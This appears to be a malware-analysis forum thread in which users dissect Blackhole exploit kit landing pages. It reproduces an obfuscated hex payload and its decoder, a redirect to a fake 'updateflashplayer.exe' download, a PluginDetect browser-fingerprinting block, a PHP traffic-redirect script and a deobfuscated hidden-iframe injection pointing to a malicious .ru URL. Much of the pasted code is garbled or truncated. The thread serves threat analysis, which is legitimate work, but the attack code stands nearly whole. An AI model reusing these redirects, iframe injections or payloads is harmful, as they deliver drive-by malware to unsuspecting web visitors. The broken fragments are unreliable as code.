6d68746470786a3fzxcvbn78626a636e626a2f2679zxcvbn69627264446f6b6a7971zxcvbn561f38646d62702f263dzxcvbn34342c2f223b70726d78zxcvbn7862747a3d756568786azxcvbn4a6b6766756d52237666zxcvbn7c787771747e3d2a697dzxcvbn6b2b706479626e736c78zxcvbn67696464746266737934zxcvbn736c612d6c766d78767azxcvbn6d666a60687570647a34zxcvbn35376e73746929406a6azxcvbn78652c6d6f6a76646774zxcvbn722b756e646f6b7a7f2ezxcvbn2e716164726a66687664zxcvbn6a6b631f6e706b776773zxcvbn7b633928273f74687873zxcvbn6b602d3b2e2f3077676azxcvbn78666264722174726a25zxcvbn6d6b677369625941766azxcvbn7a6b63623c282a68786ezxcvbn78742c736e666f786774zxcvbn6aCode: Select all
Deobfuscated result..replace(/zxcvbn/g,"");
b=[];
for (i=0; i-a.length!=0;i+=2) {
b.push(parseInt(a.substr(i, 2), 020));
}
a=b;
w = 10;
s = "";
for (k=a.length-1;k+1!=0;k--){
v=a[k];
n=a.length-k-1;
n=n-Math.floor(n/w)*w;
z=v*1+(n-6);
s=s+String.fromCharCode(z);
document.write(s); //eval(s); //in malware
}Code: Select all
Where did you found this BH landing and why it incomplete?document.write('
Waiting for redirect...
');
function end_redirect() {
window.location.href = 'http://vanthaligurukul.com/updateflashplayer.exe';
}
try {
var PluginDetect = {
version: "0.7.8",
name: "PluginDetect",
handler: function (c, b, a) {
return function () {
c(b, a)
}
},
isDefined: function (b) {
return typeof b != "undefined"
},
isArray: function (b) {
return (/array/i).test(Object.prototype.toString.call(b))
},
isFunc: function (b) {
return typeof b == "function"
},
isString: function (b) {
return typeof b == "string"
},
isNum: function (b) {
return typeof b == "number"
},
isStrNum: function (b) {
return (typeof b == "string" && (/\d/).test(b))
},
getNumRegx: /[\d][\d\.\_,-]*/,
splitNumRegx: /[\.\_,-]/g,
getNum: function (b, c) {
var d = this,
a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
return a ? a[0] : null
},
compareNums: function (h, f, d) {
var e = this,
c, b, a, g = parseInt;
if (e.isStrNum(h) && e.isStrNum(f)) {
if (e.isDefined(d) && d.compareNums) {
return d.compareNums(h, f)
}
c = h.split(e.splitNumRegx);
b = f.split(e.splitNumRegx);
for (a = 0; ag(b[a], 10)) {
return 1
}
if (g(c[a], 10) c || !(/\d/).test(e[a])) {
e[a] = "0"
}
}
return e.slice(0, 4).join(",")
},
$$hasMimeType: function (a) {
return function (c) {
if (!a.isIE && c) {
var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
for (b = 0; b2 || !f || !f.version || !(e = h.getNum(f.version))) {
return b
}
if (!b) {
return e
}
e = h.formatNum(e);
b = h.formatNum(b);
d = b.split(h.splitNumRegx);
g = e.split(h.splitNumRegx);
for (a = 0; a - 1 && a > c && d[a] != "0") {
return b
}
if (g[a] != d[a]) {
if (c == -1) {
c = a
}
if (d[a] != "0") {
return b
}
}
}
return e
}, AXO: window.ActiveXObject, getAXO: function (a) {
var f = null,
d, b = this,
c = {};
try {
f = new b.AXO(a)
} catch (d) {}
return f
}, convertFuncs: function (f) {
var a, g, d, b = /^[\$][\$]/,
c = this;
for (a in f) {
if (b.test(a)) {
try {
g = a.slice(2);
if (g.length > 0 && !f[g]) {
f[g] = f[a](f);
delete f[a]
}
} catch (d) {}
}
}
}, initObj: function (e, b, d) {
var a, c;
if (e) {
if (e[b[0]] == 1 || d) {
for (a = 0; a = 0; f = f - 2) {
if (d[f] && new RegExp(d[f], "i").test(b)) {
c.OS = d[f + 1];
break
}
}
}
c.convertFuncs(c);
c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0] || document.body || null);
c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
c.ActiveXEnabled = false;
if (c.isIE) {
var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
for (f = 0; f0 && c.isFunc(b[0])))) {
a.push(b)
}
}, callArray: function (b) {
var c = this,
a;
if (c.isArray(b)) {
for (a = 0; a0 && b.isFunc(c[0])) {
c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
} else {
if (b.isFunc(c)) {
c(b)
}
}
}, getVersionDelimiter: ",", $$getVersion: function (a) {
return function (g, d, c) {
var e = a.init(g),
f, b, h = {};
if (e.status < 0) {
return null
};
f = e.plugin;
if (f.getVersionDone != 1) {
f.getVersion(null, d, c);
if (f.getVersionDone === null) {
f.getVersionDone = 1
}
}
a.cleanup();
b = (f.version || f.version0);
b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
return b
}
}, cleanup: function () {
var a = this;
if (a.garbage && a.isDefined(window.CollectGarbage)) {
window.CollectGarbage()
}
}, addWinEvent: function (d, c) {
var e = this,
a = window,
b;
if (e.isFunc(c)) {
if (a.addEventListener) {
a.addEventListener(d, c, false)
} else {
if (a.attachEvent) {
a.attachEvent("on" + d, c)
} else {
b = a["on" + d];
a["on" + d] = e.winHandler(c, b)
}
}
}
}, winHandler: function (d, c) {
return function () {
d();
if (typeof c == "function") {
c()
}
}
}, WLfuncs0: [], WLfuncs: [], runWLfuncs: function (a) {
var b = {};
a.winLoaded = true;
a.callArray(a.WLfuncs0);
a.callArray(a.WLfuncs);
if (a.onDoneEmptyDiv) {
a.onDoneEmptyDiv()
}
}, winLoaded: false, $$onWindowLoaded: function (a) {
return function (b) {
if (a.winLoaded) {
a.call(b)
} else {
a.fPush(b, a.WLfuncs)
}
}
}, $$onDetectionDone: function (a) {
return function (h, g, c, b) {
var d = a.init(h),
k, e, j = {};
if (d.status == -3) {
return -1
}
e = d.plugin;
if (!a.isArray(e.funcs)) {
e.funcs = []
}
if (e.getVersionDone != 1) {
k = a.isMinVersion ? a.isMinVersion(h, "0", c, b) : a.getVersion(h, c, b)
}
if (e.installed != -0.5 && e.installed != 0.5) {
a.call(g);
return 1
}
if (e.NOTF) {
a.fPush(g, e.funcs);
return 0
}
return 1
}
}, div: null, divID: "plugindetect", divWidth: 50, pluginSize: 1, emptyDiv: function () {
var d = this,
b, h, c, a, f, g;
if (d.div && d.div.childNodes) {
for (b = d.div.childNodes.length - 1; b >= 0; b--) {
c = d.div.childNodes[b];
if (c && c.childNodes) {
for (h = c.childNodes.length - 1; h >= 0; h--) {
g = c.childNodes[h];
try {
c.removeChild(g)
} catch (f) {}
}
}
if (c) {
try {
d.div.removeChild(c)
} catch (f) {}
}
}
}
if (!d.div) {
a = document.getElementById(d.divID);
if (a) {
d.div = a
}
}
if (d.div && d.div.parentNode) {
try {
d.div.parentNode.removeChild(d.div)
} catch (f) {}
d.div = null
}
}, DONEfuncs: [], onDoneEmptyDiv: function () {
var c = this,
a, b;
if (!c.winLoaded) {
return
}
if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null) {
return
}
for (a in c) {
b = c[a];
if (b && b.funcs) {
if (b.OTF == 3) {
return
}
if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null) {
return
}
}
}
for (a = 0; a = i) {
return -1
}
try {
if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)) {
if (!m.winLoaded && c.winLoaded) {
return 1
}
if (m.winLoaded && c.isNum(b)) {
if (!c.isNum(m.count)) {
m.count = b
}
if (b - m.count >= 10) {
return 1
}
}
}
} catch (f) {}
return 0
}, getDOMobj: function (g, a) {
var f, d = this,
c = g ? g.span : 0,
b = c && c.firstChild ? 1 : 0;
try {
if (b && a) {
d.div.focus()
}
} catch (f) {}
return b ? c.firstChild : null
}, setStyle: function (b, g) {
var f = b.style,
a, d, c = this;
if (f && g) {
for (a = 0; ao '+c+"/div>");d=j.getElementById(b)}catch(h){}}g=(j.getElementsByTagName("body")[0]||j.body);if(g){if(g.firstChild&&f.isDefined(g.insertBefore)){g.insertBefore(a,g.firstChild)}else{g.appendChild(a)}if(d){g.removeChild(d)}}elsRing0 - the source of inspiration
Not so long ago there was a blackhole here: http://urlquery.net/report.php?id=1404469350804
Code: Select all
<?php
$url = 'http://xxx/api.php?thread=xxx&key=xxx'; // сылка на которую перенаправляются проверенные браузера
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_HEADER, 0); // читать заголовок
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FAILONERROR, 1);
$result = curl_exec($ch);
curl_close($ch);
echo header( 'Refresh: 0;'.$result );
?>
It is able to take more information from this file html.
https://www.virustotal.com/en/file/f9db ... 499847827/
https://www.virustotal.com/en/file/f9db ... 499847827/
Attachments
(10.03 KiB) Downloaded 17 times
ikolor wrote:It is able to take more information from this file html.This is an old infected page by Blackhole EK.
https://www.virustotal.com/en/file/f9db ... 499847827/
The malicious iframe, after deobfuscation, looks like
Code: Select all
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://zihemmi.ru/count26.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','http://zihemmi.ru/count26.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
Code: Select all
BR,http://zihemmi.ru/count26.php
Antelox
